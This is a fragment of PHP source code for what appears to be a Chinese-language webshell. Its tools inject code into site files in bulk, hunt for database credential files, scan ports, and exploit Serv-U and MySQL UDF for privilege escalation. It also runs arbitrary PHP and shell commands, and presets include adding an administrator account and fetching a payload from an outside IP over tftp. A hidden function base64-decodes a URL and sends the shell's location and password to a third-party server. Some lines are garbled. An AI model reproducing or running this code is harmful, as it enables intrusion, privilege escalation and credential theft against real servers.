html_n('&tr&&td&文件类型请用"|"隔开,也可以是指定文件名.&form method="POST"&&br&');
html_input("text","path",$patht,"路径范围","45");
html_input("checkbox","pass","","使用目录遍历","",true);
html_input("text","type",$typet,"&br&&br&文件类型","60");
html_text("code","67","5",$codet);
html_n('&br&&br&');
html_radio("批量挂马","批量清马","guama","qingma");
html_input("submit","passreturn","开始");
html_n('&/td&&/tr&&/form&');
if(!empty($_POST['path'])){
html_n('&tr&&td&目标文件:&br&&br&');
if(isset($_POST['pass'])) $bool = else $bool =
do_passreturn($patht,$codet,$_POST['return'],$bool,$typet);
case "tihuan":
html_n('&tr&&td&此功能可批量替换文件内容,请小心使用.&br&&br&&form method="POST"&');
html_input("text","path",root_dir,"路径范围","45");
html_input("checkbox","pass","","使用目录遍历","",true);
html_text("newcode","67","5",$_POST['newcode']);
html_n('&br&&br&替换为');
html_text("oldcode","67","5",$_POST['oldcode']);
html_input("submit","passreturn","替换","&br&&br&");
html_n('&/td&&/tr&&/form&');
if(!empty($_POST['path'])){
html_n('&tr&&td&目标文件:&br&&br&');
if(isset($_POST['pass'])) $bool = else $bool =
do_passreturn($_POST['path'],$_POST['newcode'],"tihuan",$bool,$_POST['oldcode']);
case "scanfile":
css_js("4");
html_n('&tr&&td&此功能可很方便的搜索到保存MYSQL用户密码的配置文件,用于提权.&br&当服务器文件太多时,会影响执行速度,不建议使用目录遍历.&form method="POST" name="sform"&&br&');
html_input("text","path",root_dir,"路径名","45");
html_input("checkbox","pass","","使用目录遍历","",true);
html_input("text","code",$_POST['code'],"&br&&br&关键字","40");
html_select(array("--MYSQL配置文件--","Discuz","PHPWind","phpcms","dedecms","PHPBB","wordpress","sa-blog","o-blog"),0,"onchange='return Fulll(options[selectedIndex].value)'");
html_n('&br&&br&');
html_radio("搜索文件名","搜索包含文字","scanfile","scancode");
html_input("submit","passreturn","搜索");
html_n('&/td&&/tr&&/form&');
if(!empty($_POST['path'])){
html_n('&tr&&td&找到文件:&br&&br&');
if(isset($_POST['pass'])) $bool = else $bool =
do_passreturn($_POST['path'],$_POST['code'],$_POST['return'],$bool);
case "scanphp":
html_n('&tr&&td&原理是根据特征码定义的,请查看代码判断后再进行删除.&form method="POST"&&br&');
html_input("text","path",root_dir,"查找范围","40");
html_input("checkbox","pass","","使用目录遍历&br&&br&脚本类型","",true);
html_select(array("php" =& "PHP","asp" =& "ASP","aspx" =& "ASPX","jsp" =& "JSP"));
html_input("submit","passreturn","查找","&br&&br&");
html_n('&/td&&/tr&&/form&');
if(!empty($_POST['path'])){
html_n('&tr&&td&找到文件:&br&&br&');
if(isset($_POST['pass'])) $bool = else $bool =
do_passreturn($_POST['path'],$_POST['class'],"scanphp",$bool);
case "port":
$Port_ip = isset($_POST['ip']) ? $_POST['ip'] : '127.0.0.1';
$Port_port = isset($_POST['port']) ? $_POST['port'] : '21|23|25|80|110|135|139|445|89|';
print&&&END
&form method="POST"&
&div class="actall"&扫描IP &input type="text" name="ip" value="{$Port_ip}" style="width:600"& &/div&
&div class="actall"&端口号 &input type="text" name="port" value="{$Port_port}" style="width:597"&&/div&
&div class="actall"&&input type="submit" value="扫描" style="width:80"&&/div&
if((!empty($_POST['ip'])) && (!empty($_POST['port'])))
echo '&div class="actall"&';
$ports = explode('|', $_POST['port']);
for($i = 0;$i & count($ports);$i++)
$fp = @fsockopen($_POST['ip'],$ports[$i],$errno,$errstr,2);
echo $fp ? '&font color="#FF0000"&开放端口 ---& '.$ports[$i].'&/font&&br&' : '关闭端口 ---& '.$ports[$i].'&br&';
ob_flush();
echo '&/div&';
case "getcode":
if (isset($_POST['url'])) {$proxycontents = @file_get_contents($_POST['url']);echo ($proxycontents) ? $proxycontents : "&body bgcolor=\"#F5F5F5\" style=\"font-size: 12\"&¢er&&br&&p&&b&获取 URL 内容失败&/b&&/p&&/center&&/body&";}
print&&&END
&table width="100%" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff"&
&form method="POST" target="proxyframe"&
&tr class="firstalt"&
&td align="center"&&b&在线代理&/b&&/td&
&tr class="secondalt"&
&td align="center"
&&br&&ul&&li&用本功能仅实现简单的 HTTP 代理,不会显示使用相对路径的图片、链接及CSS样式表.&/li&&li&用本功能可以通过本服务器浏览目标URL,但不支持 SQL Injection 探测以及某些特殊字符.&/li&&li&用本功能浏览的 URL,在目标主机上留下的IP记录是 : {$_SERVER['SERVER_NAME']}&/li&&/ul&&/td&
&tr class="firstalt"&
&td align="center" height=40
&URL: &input name="url" value="about:blank" type="text"
class="input" size="100" &
&input name="" value="浏览" type="submit"
class="input" size="30" &
&tr class="secondalt"&
&td align="center"
&&iframe name="proxyframe" frameborder="0" width="765" height="400" marginheight="0" marginwidth="0" scrolling="auto" src="about:blank"&&/iframe&&/td&
&/form&&/table&
case "servu":
$SUPass = isset($_POST['SUPass']) ? $_POST['SUPass'] : '#l@$ak#.0@P';
print&&&END
&div class="actall"&&a href="?eanver=servu"&[执行命令]&/a& &a href="?eanver=servu&o=adduser"&[添加用户]&/a&&/div&
&form method="POST"&
&div class="actall"&ServU端口 &input name="SUPort" type="text" value="43958" style="width:300px"&&/div&
&div class="actall"&ServU用户 &input name="SUUser" type="text" value="LocalAdministrator" style="width:300px"&&/div&
&div class="actall"&ServU密码 &input name="SUPass" type="text" value="{$SUPass}" style="width:300px"&&/div&
if($_GET['o'] == 'adduser')
print&&&END
&div class="actall"&帐号 &input name="user" type="text" value="envl" style="width:200px"&
密码 &input name="password" type="text" value="envl" style="width:200px"&
目录 &input name="part" type="text" value="C:\\\\" style="width:200px"&&/div&
print&&&END
&div class="actall"&提权命令 &input name="SUCommand" type="text" value="net user envl envl /add & net localgroup administrators envl /add" style="width:600px"&&br&
&input name="user" type="hidden" value="envl"&
&input name="password" type="hidden" value="envl"&
&input name="part" type="hidden" value="C:\\\\"&&/div&
echo '&div class="actall"&&input type="submit" value="执行" style="width:80"&&/div&&/form&';
if((!empty($_POST['SUPort'])) && (!empty($_POST['SUUser'])) && (!empty($_POST['SUPass'])))
echo '&div class="actall"&';
$sendbuf = "";
$recvbuf = "";
= "-SETDOMAIN\r\n"."-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n"."-TZOEnable=0\r\n"." TZOKey=\r\n";
$adduser = "-SETUSERSETUP\r\n"."-IP=0.0.0.0\r\n"."-PortNo=21\r\n"."-User=".$_POST['user']."\r\n"."-Password=".$_POST['password']."\r\n"."-HomeDir=c:\\\r\n"."-LoginMesFile=\r\n"."-Disable=0\r\n"."-RelPaths=1\r\n"."-NeedSecure=0\r\n"."-HideHidden=0\r\n"."-AlwaysAllowLogin=0\r\n"."-ChangePassword=0\r\n".
"-QuotaEnable=0\r\n"."-MaxUsersLoginPerIP=-1\r\n"."-SpeedLimitUp=0\r\n"."-SpeedLimitDown=0\r\n"."-MaxNrUsers=-1\r\n"."-IdleTimeOut=600\r\n"."-SessionTimeOut=-1\r\n"."-Expire=0\r\n"."-RatioUp=1\r\n"."-RatioDown=1\r\n"."-RatiosCredit=0\r\n"."-QuotaCurrent=0\r\n"."-QuotaMaximum=0\r\n".
"-Maintenance=None\r\n"."-PasswordType=Regular\r\n"."-Ratios=None\r\n"." Access=".$_POST['part']."\|RWAMELCDP\r\n";
$deldomain = "-DELETEDOMAIN\r\n"."-IP=0.0.0.0\r\n"." PortNo=21\r\n";
$sock = @fsockopen("127.0.0.1", $_POST["SUPort"],$errno,$errstr, 10);
$recvbuf = @fgets($sock, 1024);
echo "返回数据包: $recvbuf &br&";
$sendbuf = "USER ".$_POST["SUUser"]."\r\n";
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "发送数据包: $sendbuf &br&";
$recvbuf = @fgets($sock, 1024);
echo "返回数据包: $recvbuf &br&";
$sendbuf = "PASS ".$_POST["SUPass"]."\r\n";
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "发送数据包: $sendbuf &br&";
$recvbuf = @fgets($sock, 1024);
echo "返回数据包: $recvbuf &br&";
$sendbuf = "SITE MAINTENANCE\r\n";
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "发送数据包: $sendbuf &br&";
$recvbuf = @fgets($sock, 1024);
echo "返回数据包: $recvbuf &br&";
$sendbuf = $
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "发送数据包: $sendbuf &br&";
$recvbuf = @fgets($sock, 1024);
echo "返回数据包: $recvbuf &br&";
$sendbuf = $
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "发送数据包: $sendbuf &br&";
$recvbuf = @fgets($sock, 1024);
echo "返回数据包: $recvbuf &br&";
if(!empty($_POST['SUCommand']))
$exp = @fsockopen("127.0.0.1", "21",$errno,$errstr, 10);
$recvbuf = @fgets($exp, 1024);
echo "返回数据包: $recvbuf &br&";
$sendbuf = "USER ".$_POST['user']."\r\n";
@fputs($exp, $sendbuf, strlen($sendbuf));
echo "发送数据包: $sendbuf &br&";
$recvbuf = @fgets($exp, 1024);
echo "返回数据包: $recvbuf &br&";
$sendbuf = "PASS ".$_POST['password']."\r\n";
@fputs($exp, $sendbuf, strlen($sendbuf));
echo "发送数据包: $sendbuf &br&";
$recvbuf = @fgets($exp, 1024);
echo "返回数据包: $recvbuf &br&";
$sendbuf = "site exec ".$_POST["SUCommand"]."\r\n";
@fputs($exp, $sendbuf, strlen($sendbuf));
echo "发送数据包: site exec &font color=#006600&".$_POST["SUCommand"]."&/font& &br&";
$recvbuf = @fgets($exp, 1024);
echo "返回数据包: $recvbuf &br&";
$sendbuf = $
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "发送数据包: $sendbuf &br&";
$recvbuf = @fgets($sock, 1024);
echo "返回数据包: $recvbuf &br&";
@fclose($exp);
@fclose($sock);
echo '&/div&';
case "eval":
$phpcode = isset($_POST['phpcode']) ? $_POST['phpcode'] : "phpinfo();";
html_n('&tr&&td&&form method="POST"&不用写&? ?&标签');
html_text("phpcode","70","15",$phpcode);
html_input("submit","eval","执行","&br&&br&");
if(!empty($_POST['eval'])){
echo "&br&&br&";
eval(stripslashes($phpcode));
html_n('&/form&');
case "myexp":
$MSG_BOX = '请先导出DLL,再执行命令.MYSQL用户必须为root权限,导出路径必须能加载DLL文件.';
$info = '命令回显';
$mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $mpath = 'C:/windows/mysqlDll.dll'; $sqlcmd = 'ver';
if(isset($_POST['mhost']) && isset($_POST['muser']))
$mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport']; $mpath = File_Str($_POST['mpath']); $sqlcmd = $_POST['sqlcmd'];
$conn = mysql_connect($mhost.':'.$mport,$muser,$mpass);
@mysql_select_db($mdata);
if((!empty($_POST['outdll'])) && (!empty($_POST['mpath'])))
$query = "CREATE TABLE Envl_Temp_Tab (envl BLOB);";
if(@mysql_query($query,$conn))
$shellcode = Mysql_shellcode();
$query = "INSERT into Envl_Temp_Tab values (CONVERT(".$shellcode.",CHAR));";
if(@mysql_query($query,$conn))
$query = 'SELECT envl FROM Envl_Temp_Tab INTO DUMPFILE \''.$mpath.'\';';
if(@mysql_query($query,$conn))
$ap = explode('/', $mpath); $inpath = array_pop($ap);
$query = 'Create Function state returns string soname \''.$inpath.'\';';
$MSG_BOX = @mysql_query($query,$conn) ? '安装DLL成功' : '安装DLL失败';
else $MSG_BOX = '导出DLL文件失败';
else $MSG_BOX = '写入临时表失败';
@mysql_query('DROP TABLE Envl_Temp_T',$conn);
else $MSG_BOX = '创建临时表失败';
if(!empty($_POST['runcmd']))
$query = 'select state("'.$sqlcmd.'");';
$result = @mysql_query($query,$conn);
if($result)
$k = 0; $info = NULL;
while($row = @mysql_fetch_array($result)){$infotmp .= $row[$k];$k++;}
$MSG_BOX = '执行成功';
else $MSG_BOX = '执行失败';
else $MSG_BOX = '连接MYSQL失败';
print&&&END
&script language="javascript"&
function Fullm(i){
Str = new Array(11);
Str[0] = "ver";
Str[1] = "net user envl envl /add";
Str[2] = "net localgroup administrators envl /add";
Str[3] = "net start Terminal Services";
Str[4] = "tasklist /svc";
Str[5] = "netstat -ano";
Str[6] = "ipconfig";
Str[7] = "net user guest /active:yes";
Str[8] = "copy c:\\\\1.php d:\\\\2.php";
Str[9] = "tftp -i 219.134.46.245 get server.exe c:\\\\server.exe";
Str[10] = "net start telnet";
Str[11] = "shutdown -r -t 0";
mform.sqlcmd.value = Str[i];
&form id="mform" method="POST"&
&div id="msgbox" class="msgbox"&{$MSG_BOX}&/div&
¢er&&div class="actall"&
地址 &input type="text" name="mhost" value="{$mhost}" style="width:110px"&
端口 &input type="text" name="mport" value="{$mport}" style="width:110px"&
用户 &input type="text" name="muser" value="{$muser}" style="width:110px"&
密码 &input type="text" name="mpass" value="{$mpass}" style="width:110px"&
库名 &input type="text" name="mdata" value="{$mdata}" style="width:110px"&
&/div&&div class="actall"&
可加载路径 &input type="text" name="mpath" value="{$mpath}" style="width:555px"&
&input type="submit" name="outdll" value="安装DLL" style="width:80"&&/div&
&div class="actall"&安装成功后可用 &br&&input type="text" name="sqlcmd" value="{$sqlcmd}" style="width:515"&
&select onchange="return Fullm(options[selectedIndex].value)"&
&option value="0" selected&--命令集合--&/option&
&option value="1"&添加管理员&/option&
&option value="2"&设为管理组&/option&
&option value="3"&开启远程桌面&/option&
&option value="4"&查看进程和PID&/option&
&option value="5"&查看端口和PID&/option&
&option value="6"&查看IP&/option&
&option value="7"&激活guest帐户&/option&
&option value="8"&复制文件&/option&
&option value="9"&ftp下载&/option&
&option value="10"&开启telnet&/option&
&option value="11"&重启&/option&
&input type="submit" name="runcmd" value="执行" style="width:80"&
&textarea style="width:720height:300"&{$info}&/textarea&
&/div&&/center&
case "mysql_exec":
if(isset($_POST['mhost']) && isset($_POST['mport']) && isset($_POST['muser']) && isset($_POST['mpass']))
if(@mysql_connect($_POST['mhost'].':'.$_POST['mport'],$_POST['muser'],$_POST['mpass']))
$cookietime = time() + 24 * 3600;
setcookie('m_eanverhost',$_POST['mhost'],$cookietime);
setcookie('m_eanverport',$_POST['mport'],$cookietime);
setcookie('m_eanveruser',$_POST['muser'],$cookietime);
setcookie('m_eanverpass',$_POST['mpass'],$cookietime);
die('正在登陆,请稍候...&meta http-equiv="refresh" content="0;URL=?eanver=mysql_msg"&');
print&&&END
&form method="POST" name="oform" id="oform"&
&div class="actall"&地址 &input type="text" name="mhost" value="localhost" style="width:300px"&&/div&
&div class="actall"&端口 &input type="text" name="mport" value="3306" style="width:300px"&&/div&
&div class="actall"&用户 &input type="text" name="muser" value="root" style="width:300px"&&/div&
&div class="actall"&密码 &input type="text" name="mpass" value="" style="width:300px"&&/div&
&div class="actall"&&input type="submit" value="登陆" style="width:80"& &input type="button" value="COOKIE" style="width:80" onclick="window.location='?eanver=mysql_msg';"&&/div&
case "mysql_msg":
$conn = @mysql_connect($_COOKIE['m_eanverhost'].':'.$_COOKIE['m_eanverport'],$_COOKIE['m_eanveruser'],$_COOKIE['m_eanverpass']);
print&&&END
&script language="javascript"&
function Delok(msg,gourl)
smsg = "确定要删除[" + unescape(msg) + "]吗?";
if(confirm(smsg)){window.location =}
function Createok(ac)
if(ac == 'a') document.getElementById('nsql').value = 'CREATE TABLE name (eanver BLOB);';
if(ac == 'b') document.getElementById('nsql').value = 'CREATE DATABASE';
if(ac == 'c') document.getElementById('nsql').value = 'DROP DATABASE';
$MSG_BOX = '用户:'.$_COOKIE['m_eanveruser'].' &&&& 地址:'.$_COOKIE['m_eanverhost'].':'.$_COOKIE['m_eanverport'].' &&&& 版本:';
$result = @mysql_query('select version();',$conn);
while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;}
echo '&div class="actall"& 数据库:';
$result = mysql_query("SHOW DATABASES",$conn);
while($db = mysql_fetch_array($result)){echo '&&[&a href="?eanver=mysql_msg&db='.$db['Database'].'"&'.$db['Database'].'&/a&]';}
echo '&/div&';
if(isset($_GET['db']))
mysql_select_db($_GET['db'],$conn);
if(!empty($_POST['nsql'])){$BOOL = $MSG_BOX = mysql_query($_POST['nsql'],$conn) ? '执行成功' : '执行失败 '.mysql_error();}
if(is_array($_POST['insql']))
$query = 'INSERT INTO '.$_GET['table'].' (';
foreach($_POST['insql'] as $var =& $key)
$querya .= $var.',';
$queryb .= '\''.addslashes($key).'\',';
$query = $query.substr($querya, 0, -1).') VALUES ('.substr($queryb, 0, -1).');';
$MSG_BOX = mysql_query($query,$conn) ? '添加成功' : '添加失败 '.mysql_error();
if(is_array($_POST['upsql']))
$query = 'UPDATE '.$_GET['table'].' SET ';
foreach($_POST['upsql'] as $var =& $key)
$queryb .= $var.'=\''.addslashes($key).'\',';
$query = $query.substr($queryb, 0, -1).' '.base64_decode($_POST['wherevar']).';';
$MSG_BOX = mysql_query($query,$conn) ? '修改成功' : '修改失败 '.mysql_error();
if(isset($_GET['del']))
$result = mysql_query('SELECT * FROM '.$_GET['table'].' LIMIT '.$_GET['del'].', 1;',$conn);
$good = mysql_fetch_assoc($result);
$query = 'DELETE FROM '.$_GET['table'].' WHERE ';
foreach($good as $var =& $key){$queryc .= $var.'=\''.addslashes($key).'\' AND ';}
$where = $query.substr($queryc, 0, -4).';';
$MSG_BOX = mysql_query($where,$conn) ? '删除成功' : '删除失败 '.mysql_error();
$action = '?eanver=mysql_msg&db='.$_GET['db'];
if(isset($_GET['drop'])){$query = 'Drop TABLE IF EXISTS '.$_GET['drop'].';';$MSG_BOX = mysql_query($query,$conn) ? '删除成功' : '删除失败 '.mysql_error();}
if(isset($_GET['table'])){$action .= '&table='.$_GET['table'];if(isset($_GET['edit'])) $action .= '&edit='.$_GET['edit'];}
if(isset($_GET['insert'])) $action .= '&insert='.$_GET['insert'];
echo '&div class="actall"&&form method="POST" action="'.$action.'"&';
echo '&textarea name="nsql" id="nsql" style="width:500height:50"&'.$_POST['nsql'].'&/textarea& ';
echo '&input type="submit" name="querysql" value="执行" style="width:60height:49"& ';
echo '&input type="button" value="创建表" style="width:60height:49" onclick="Createok(\'a\')"& ';
echo '&input type="button" value="创建库" style="width:60height:49" onclick="Createok(\'b\')"& ';
echo '&input type="button" value="删除库" style="width:60height:49" onclick="Createok(\'c\')"&&/form&&/div&';
echo '&div class="msgbox" style="height:40"&'.$MSG_BOX.'&/div&&div class="actall"&&a href="?eanver=mysql_msg&db='.$_GET['db'].'"&'.$_GET['db'].'&/a& ---& ';
if(isset($_GET['table']))
echo '&a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['table'].'"&'.$_GET['table'].'&/a& ';
echo '[&a href="?eanver=mysql_msg&db='.$_GET['db'].'&insert='.$_GET['table'].'"&插入&/a&]&/div&';
if(isset($_GET['edit']))
if(isset($_GET['p'])) $atable = $_GET['table'].'&p='.$_GET['p']; else $atable = $_GET['table'];
echo '&form method="POST" action="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$atable.'"&';
$result = mysql_query('SELECT * FROM '.$_GET['table'].' LIMIT '.$_GET['edit'].', 1;',$conn);
$good = mysql_fetch_assoc($result);
foreach($good as $var =& $key)
$queryc .= $var.'=\''.$key.'\' AND ';
$type = @mysql_field_type($result, $u);
$len = @mysql_field_len($result, $u);
echo '&div class="actall"&'.$var.' &font color="#FF0000"&'.$type.'('.$len.')&/font&&br&&textarea name="upsql['.$var.']" style="width:600height:60"&'.htmlspecialchars($key).'&/textarea&&/div&';
$where = 'WHERE '.substr($queryc, 0, -4);
echo '&input type="hidden" id="wherevar" name="wherevar" value="'.base64_encode($where).'"&';
echo '&div class="actall"&&input type="submit" value="Update" style="width:80"&&/div&&/form&';
$query = 'SHOW COLUMNS FROM '.$_GET['table'];
$result = mysql_query($query,$conn);
$fields = array();
$pagesize=20;
$row_num = mysql_num_rows(mysql_query('SELECT * FROM '.$_GET['table'],$conn));
$numrows=$row_
$pages=intval($numrows/$pagesize);
if ($numrows%$pagesize) $pages++;
$offset=$pagesize*($page - 1);
$page=$_GET['p'];
if(!$page) $page=1;
if(!isset($_GET['p'])){$p = 0;$_GET['p'] = 1;} else $p = ((int)$_GET['p']-1)*20;
echo '&table border="0"&&tr&';
echo '&td class="toptd" style="width:70" nowrap&操作&/td&';
while($row = @mysql_fetch_assoc($result))
array_push($fields,$row['Field']);
echo '&td class="toptd" nowrap&'.$row['Field'].'&/td&';
echo '&/tr&';
if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $query = $_POST['nsql']; else $query = 'SELECT * FROM '.$_GET['table'].' LIMIT '.$p.', 20;';
$result = mysql_query($query,$conn);
while($text = @mysql_fetch_assoc($result))
echo '&tr&&td&&a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['table'].'&p='.$_GET['p'].'&edit='.$v.'"& 修改 &/a& ';
echo '&a href="#" onclick="Delok(\'它\',\'?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['table'].'&p='.$_GET['p'].'&del='.$v.'\');"& 删除 &/a&&/td&';
foreach($fields as $row){echo '&td&'.nl2br(htmlspecialchars(Mysql_Len($text[$row],500))).'&/td&';}
echo '&/tr&'."\r\n";$v++;
echo '&/table&&div class="actall"&';
$pagep=$page-1;
$pagen=$page+1;
echo "共有 ".$row_num." 条记录 ";
if($pagep&0) $pagenav.="
&a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=1&charset=".$_GET['charset']."'&首页&/a& &a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=".$pagep."&charset=".$_GET['charset']."'&上一页&/a& "; else $pagenav.=" 上一页 ";
if($pagen&=$pages) $pagenav.=" &a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=".$pagen."&charset=".$_GET['charset']."'&下一页&/a& &a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=".$pages."&charset=".$_GET['charset']."'&尾页&/a&"; else $pagenav.=" 下一页 ";
$pagenav.=" 第 [".$page."/".$pages."] 页
跳到&input name='textfield' type='text' style='text-align:' size='4' value='".$page."' onkeydown=\"if(event.keyCode==13)self.location.href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p='+this.value+'&charset=".$_GET['charset']."';\" /&页";
echo '&/div&';
elseif(isset($_GET['insert']))
echo '&a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['insert'].'"&'.$_GET['insert'].'&/a&&/div&';
$result = mysql_query('SELECT * FROM '.$_GET['insert'],$conn);
$fieldnum = @mysql_num_fields($result);
echo '&form method="POST" action="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['insert'].'"&';
for($i = 0;$i & $$i++)
$name = @mysql_field_name($result, $i);
$type = @mysql_field_type($result, $i);
$len = @mysql_field_len($result, $i);
echo '&div class="actall"&'.$name.' &font color="#FF0000"&'.$type.'('.$len.')&/font&&br&&textarea name="insql['.$name.']" style="width:600height:60"&&/textarea&&/div&';
echo '&div class="actall"&&input type="submit" value="Insert" style="width:80"&&/div&&/form&';
$query = 'SHOW TABLE STATUS';
$status = @mysql_query($query,$conn);
while($statu = @mysql_fetch_array($status))
$statusize[] = $statu['Data_length'];
$statucoll[] = $statu['Collation'];
$query = 'SHOW TABLES FROM '.$_GET['db'].';';
echo '&/div&&table border="0"&&tr&';
echo '&td class="toptd" style="width:550"& 表名 &/td&';
echo '&td class="toptd" style="width:80"& 操作 &/td&';
echo '&td class="toptd" style="width:130"& 字符集 &/td&';
echo '&td class="toptd" style="width:70"& 大小 &/td&&/tr&';
$result = @mysql_query($query,$conn);
while($table = mysql_fetch_row($result))
$charset=substr($statucoll[$k],0,strpos($statucoll[$k],'_'));
echo '&tr&&td&&a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$table[0].'"&'.$table[0].'&/a&&/td&';
echo '&td&&a href="?eanver=mysql_msg&db='.$_GET['db'].'&insert='.$table[0].'"& 插入 &/a& &a href="#" onclick="Delok(\''.$table[0].'\',\'?eanver=mysql_msg&db='.$_GET['db'].'&drop='.$table[0].'\');"& 删除 &/a&&/td&';
echo '&td&'.$statucoll[$k].'&/td&&td align="right"&'.File_Size($statusize[$k]).'&/td&&/tr&'."\r\n";
echo '&/table&';
else die('连接MYSQL失败,请重新登陆.&meta http-equiv="refresh" content="0;URL=?eanver=mysql_exec"&');
if(!$BOOL and addslashes($query)!='') echo '&script type="text/javascript"&document.getElementById(\'nsql\').value = \''.addslashes($query).'\';&/script&';
default: html_main($path,$shellname);
css_foot();
/*---doing---*/
function do_write($file,$t,$text)
$handle = @fopen($file,$t);
if(!@fwrite($handle,$text))
@chmod($file,0666);
$key = @fwrite($handle,$text) ? true :
@fclose($handle);
function do_show($filepath){
$show = array();
$dir = dir($filepath);
while($file = $dir-&read()){
if($file == '.' or $file == '..')
$files = str_path($filepath.'/'.$file);
$show[] = $
$dir-&close();
function do_deltree($deldir){
$showfile = do_show($deldir);
foreach($showfile as $del){
if(is_dir($del)){
if(!do_deltree($del))
}elseif(!is_dir($del)){
@chmod($del,0777);
if(!@unlink($del))
@chmod($deldir,0777);
if(!@rmdir($deldir))
function do_showsql($query,$conn){
$result = @mysql_query($query,$conn);
html_n('&br&&br&&textarea cols="70" rows="15"&');
while($row = @mysql_fetch_array($result)){
for($i=0;$i & @mysql_num_fields($result);$i++){
html_n(htmlspecialchars($row[$i]));
html_n('&/textarea&');
function hmlogin($xiao=1){
@set_time_limit(10);
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$serverp =
$copyurl = base64_decode('aHR0cDovL3d3dy50cm95cGxhbi5jb20vcC5hc3B4P249');
$url=$copyurl.$serveru.'&p='.$
$url=urldecode($url);
$re=file_get_contents($url);
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$serverp =
if (strpos($serveru,"0.0")&0 or strpos($serveru,"192.168.")&0 or strpos($serveru,"localhost")&0 or ($serveru==$_COOKIE['serveru'] and $serverp==$_COOKIE['serverp'])) {echo "&meta http-equiv='refresh' content='0;URL=?'&";} else {setcookie('serveru',$serveru);setcookie('serverp',$serverp);if($xiao==1){echo "&script src='?login=geturl'&&/script&&meta http-equiv='refresh' content='0;URL=?'&";}else{geturl();}}
function do_down($fd){
if(!@file_exists($fd)) msg('下载文件不存在');
$fileinfo = pathinfo($fd);
header('Content-type: application/x-'.$fileinfo['extension']);
header('Content-Disposition: filename='.$fileinfo['basename']);
header('Content-Length: '.filesize($fd));
@readfile($fd);
function do_download($filecode,$file){
header("Content-type: application/unknown");
header('Accept-Ranges: bytes');
header("Content-length: ".strlen($filecode));
header("Content-disposition: filename=".$file.";");
function TestUtf8($text)
{if(strlen($text) & 3)
$lastch = 0;
$begin = 0;
$BOMchs = array(0xEF, 0xBB, 0xBF);
$good = 0;
$notAscii = 0;
for($i=0; $i & strlen($text); $i++)
{$ch = ord($text[$i]);
if($begin & 3)
{ $BOM = ($BOMchs[$begin]==$ch);
$begin += 1;
if($begin==4 && $BOM)
if($ch &= 0x80 ) $notAscii++;
if( ($ch&0xC0) == 0x80 )
{if( ($lastch&0xC0) == 0xC0 )
{$good += 1;}
else if( ($lastch&0x80) == 0 )
{$bad += 1; }}
else if( ($lastch&0xC0) == 0xC0 )
{$bad += 1;}
$lastch = $}
if($begin == 4 && $BOM)
{return 2;}
else if($notAscii==0)
{return 1;}
else if ($good &= $bad )
{return 2;}
{return 0;}}
function File_Str($string)
return str_replace('//','/',str_replace('\\','/',$string));
function File_Write($filename,$filecode,$filemode)
$handle = @fopen($filename,$filemode);
if(!@fwrite($handle,$filecode))
@chmod($filename,0666);
$key = @fwrite($handle,$filecode) ? true :
@fclose($handle);
function File_Mode()
$RealPath = realpath('./');
$SelfPath = $_SERVER['PHP_SELF'];
$SelfPath = substr($SelfPath, 0, strrpos($SelfPath,'/'));
return File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath)));
function File_Size($size)
$kb = 1024;
// Kilobyte
$mb = 1024 * $
// Megabyte
$gb = 1024 * $
// Gigabyte
$tb = 1024 * $
// Terabyte
if($size & $kb)
return $size." B";
else if($size & $mb)
return round($size/$kb,2)." K";
else if($size & $gb)
return round($size/$mb,2)." M";
else if($size & $tb)
return round($size/$gb,2)." G";
return round($size/$tb,2)." T";
function File_Read($filename)
$handle = @fopen($filename,"rb");
$filecode = @fread($handle,@filesize($filename));
@fclose($handle);
function Info_Cfg($varname){switch($result = get_cfg_var($varname)){case 0: return "No"; case 1: return "Yes"; default: return $}}
function Info_Fun($funName){return (false !== function_exists($funName)) ? "Yes" : "No";}
function do_phpfun($cmd,$fun) {
$res = '';
switch($fun){
case "exec": @exec($cmd,$res); $res = join("\n",$res);
case "shell_exec": $res = @shell_exec($cmd);
case "system": @ob_start(); @system($cmd); $res = @ob_get_contents(); @ob_end_clean();
case "passthru": @ob_start(); @passthru($cmd); $res = @ob_get_contents(); @ob_end_clean();
case "popen": if(@is_resource($f = @popen($cmd,"r"))){ while(!@feof($f)) $res .= @fread($f,1024);} @pclose($f);
function do_passreturn($dir,$code,$type,$bool,$filetype = '',$shell = my_shell){
$show = do_show($dir);
foreach($show as $files){
if(is_dir($files) && $bool){
do_passreturn($files,$code,$type,$bool,$filetype,$shell);
if($files == $shell)
switch($type){
case "guama":
if(debug($files,$filetype)){
do_write($files,"ab","\n".$code) ? html_n("成功--& $files&br&") : html_n("失败--& $files&br&");
case "qingma":
$filecode = @file_get_contents($files);
if(stristr($filecode,$code)){
$newcode = str_replace($code,'',$filecode);
do_write($files,"wb",$newcode) ? html_n("成功--& $files&br&") : html_n("失败--& $files&br&");
case "tihuan":
$filecode = @file_get_contents($files);
if(stristr($filecode,$code)){
